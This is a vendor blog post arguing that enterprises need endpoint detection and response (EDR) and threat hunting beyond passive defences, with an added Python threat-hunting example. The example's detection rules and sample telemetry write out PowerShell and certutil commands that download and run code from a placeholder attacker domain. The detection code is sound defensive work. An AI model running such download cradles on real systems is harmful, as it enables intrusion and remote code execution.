Creating an enterprise security strategy: How much is enough?

Author: Oleg Glebov | Date: Thu, 21 Sep 2017 11:00:19 +0000

When talking about an IT security strategy, businesses are interested in one question: What measures are sufficient? For a long time, common wisdom held that a passive strategy — protecting the network perimeter and workstations — sufficed. But with enterprises increasingly falling victim to advanced and targeted attacks, it’s now clear that protection requires new methods, such as EDR (endpoint detection and response).

Why passive strategies aren’t enough

Passive strategies work well against mass threats: mailings containing Trojans, phishing schemes, exploitation of well-known vulnerabilities, and so forth. In other words, they are effective when attackers cast a wide net, hoping to reel in, and profit from, anyone they manage to trick. That business is illegal, but it still follows ordinary business logic, seeking a balance between the complexity (and thus cost) of an attack and the expected profit.


But if your company becomes an interesting target (and an enterprise is very likely to attract interest), it may become a specific one. Those targeting a company may be after completely different things: financial transactions, trade secrets, or customer data. The goal may simply be to sabotage you to help your competitors, or attackers may decide that your industry as a whole is profitable to attack.

This is where criminals start investing in complex, targeted attacks. They research the software your company uses, look for vulnerabilities not yet known to the vendor or the public, and develop unique exploits for them. They may look for a way in through partners and suppliers, or bribe former employees. They may find disgruntled employees and organize an attack from the inside. In the latter scenario, criminals may do without malware entirely, relying exclusively on legitimate administrative tools that a traditional security solution will not consider threats.

Why a delay is so dangerous

There is a chance that passive systems will detect a targeted attack, or some activity associated with one. Even when they do, however, they usually register only the fact that an incident occurred, which does not help you quickly determine what actually happened, which information was affected, how to stop the attack, and how to prevent it from recurring.
If your company uses only traditional endpoint security tools, its security staff will not always be able to respond to an attack in time. Their hands are tied while they wait for an incident to be flagged, and only then can they start an investigation. They may also miss a high-priority incident among the hundreds of minor ones that are simply part of doing business.

Analysts usually obtain the data they need much later, and only after a careful investigation, which typically involves painstaking manual work, is the incident handed to response and recovery experts. Even in large companies with serious response centers, all three roles (security specialist, analyst, and response expert) are in many cases performed by the same person.
According to our statistics, an average of 214 days pass from the initial penetration of a system to the moment a large company detects a complex threat. In the best case, IT security specialists identify traces of the attack at the last stage of the kill chain. More often, they are left to calculate losses and recover systems after the fact.

How to minimize risks and optimize IT security

A new, adaptive approach is required to protect an organization's intellectual property, reputation, and other key assets. Perimeter and workstation protection must be adjusted and reinforced with tools for actively searching for threats and with unified investigation and response.

A True Cybersecurity strategy involves active search for threats, known as threat hunting. It is a rather difficult task, but specialized tools can make it significantly easier. EDR, or endpoint detection and response, is one such tool. It gives IT security staff the ability to quickly identify threats on workstations through a unified interface, automatically gather information, and neutralize an attack. EDR systems also consume threat intelligence, which many companies acquire from various sources, to check activity within their corporate networks against known indicators of compromise.

Theoretically, threat hunting can be performed without EDR; however, purely manual threat hunting is significantly more expensive and less effective. It can also disrupt business processes, because it requires analysts to work directly on a wide range of workstations.

In essence, EDR gives security operations center experts the ability to quickly collect all the information they need, analyze it (both automatically and manually), and make decisions; through the same unified interface they can then remotely delete any file or malware, quarantine any object, and launch any processes required for recovery. Users never notice a thing, because none of this requires physical access to the workstation or disrupts business operations.
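As an added illustration (not code from the original post, nor from Kaspersky's EDR product), here is a small threat hunt in Python run over constructed process-creation telemetry of the kind an EDR agent records. It looks for the malware-free technique described earlier, legitimate tools used against you: PowerShell and certutil acting as downloaders, and Office applications spawning script hosts. It also matches command lines and file hashes against a small, hypothetical threat-intelligence list. The event schema, the indicators, the hostnames and the sample events are all invented for the example.

```python
"""Threat hunt over EDR-style process-creation events (added example, not Kaspersky code)."""
import base64
import re
from collections import defaultdict
from dataclasses import dataclass

# Living-off-the-land patterns: Office apps that should never spawn a script host.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}

# PowerShell download-cradle vocabulary and the -EncodedCommand switch variants.
CRADLE_RE = re.compile(r"downloadstring|downloadfile|invoke-expression|\biex\b|net\.webclient|invoke-webrequest", re.I)
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
DOMAIN_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)

# Hypothetical threat-intelligence feed (constructed indicators, not real IOCs).
IOC_DOMAINS = {"cdn-update.example.net"}
IOC_SHA256 = {"deadbeef" * 8}


@dataclass(frozen=True)
class Finding:
    host: str
    image: str
    rule: str


def decode_encoded_powershell(cmdline: str) -> str:
    """Return the plaintext of a -EncodedCommand payload (base64 of UTF-16LE), or ''."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:  # malformed base64 (binascii.Error is a ValueError)
        return ""


def hunt(events, ioc_domains, ioc_hashes):
    """Run every hunt rule over every event and return one Finding per rule hit."""
    findings = []
    for ev in events:
        host, parent, image = ev["host"], ev["parent"].lower(), ev["image"].lower()
        cmdline = ev.get("cmdline", "")
        decoded = decode_encoded_powershell(cmdline)
        searchable = cmdline + " " + decoded  # hunt over the decoded payload as well

        if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
            findings.append(Finding(host, image, "office_app_spawned_script_host"))
        if image == "powershell.exe" and CRADLE_RE.search(decoded):
            findings.append(Finding(host, image, "encoded_powershell_download_cradle"))
        if image == "certutil.exe" and "-urlcache" in cmdline.lower():
            findings.append(Finding(host, image, "certutil_used_as_downloader"))
        if any(d.lower() in ioc_domains for d in DOMAIN_RE.findall(searchable)):
            findings.append(Finding(host, image, "command_line_contacts_ioc_domain"))
        if ev.get("sha256", "").lower() in ioc_hashes:
            findings.append(Finding(host, image, "image_hash_matches_ioc"))
    return findings


def prioritize(findings):
    """Group hits by host; hosts with the most distinct rules firing come first."""
    by_host = defaultdict(set)
    for f in findings:
        by_host[f.host].add(f.rule)
    return sorted(by_host.items(), key=lambda kv: (-len(kv[1]), kv[0]))


def _encode_ps(script: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry: one benign server and three workstations with attacker activity.
SAMPLE_EVENTS = [
    {"host": "ws-017", "parent": "outlook.exe", "image": "winword.exe",
     "cmdline": 'winword.exe /n "invoice.docx"', "sha256": "a1"},
    {"host": "ws-017", "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + _encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://cdn-update.example.net/a.ps1')"),
     "sha256": "b2"},
    {"host": "srv-db-02", "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs", "sha256": "c3"},
    {"host": "ws-031", "parent": "explorer.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://cdn-update.example.net/x.bin x.bin",
     "sha256": "d4"},
    {"host": "ws-044", "parent": "cmd.exe", "image": "update.exe",
     "cmdline": "update.exe /silent", "sha256": "deadbeef" * 8},
]

if __name__ == "__main__":
    for host, rules in prioritize(hunt(SAMPLE_EVENTS, IOC_DOMAINS, IOC_SHA256)):
        print(f"{host}: {len(rules)} rule(s) fired -> {sorted(rules)}")
```

Two points worth noting. The hunt decodes the `-EncodedCommand` payload before searching it, because a rule that only inspects the visible command line misses the download cradle entirely; that is exactly the gap a malware-free attacker relies on. And hosts where several independent rules fire are ranked first, which is the prioritization the text says analysts otherwise have to do by hand among hundreds of minor incidents.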

We’ve been working on solutions for these issues for some time and have launched a pilot version of our own EDR solution. We invite you to join our EDR piloting program and learn more about our solution.
